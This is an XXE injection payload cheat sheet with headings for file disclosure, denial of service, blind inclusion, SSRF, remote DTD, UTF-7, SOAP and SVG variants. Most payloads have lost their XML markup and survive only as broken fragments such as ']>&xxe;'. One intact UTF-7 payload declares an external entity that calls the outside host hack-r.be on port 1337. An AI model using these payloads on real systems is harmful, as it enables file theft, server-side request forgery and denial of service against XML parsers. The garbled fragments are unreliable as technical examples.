# XML External Entity (XXE) Injection Payloads
* XXE : Classic XXE
]>
&file;
]>&xxe;
]>&xxe;
]>&xxe;
* XXE: Basic XML Example
John
Doe
* XXE: Entity Example
]>
John
&example;
* XXE: File Disclosure
]>
John
&ent;
* XXE: Denial-of-Service Example
&lol9;
* XXE: Local File Inclusion Example
]>&xxe;
* XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)
]>&blind;
* XXE: Access Control Bypass (Loading Restricted Resources - PHP example)
]>
∾
* XXE:SSRF ( Server Side Request Forgery ) Example
]>&xxe;
* XXE: (Remote Attack - Through External Xml Inclusion) Exmaple
]>
3..2..1...&test
* XXE: UTF-7 Exmaple
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
* XXE: Base64 Encoded
%init; ]>
* XXE: XXE inside SOAP Example
%dtd;]>]]>
* XXE: XXE inside SVG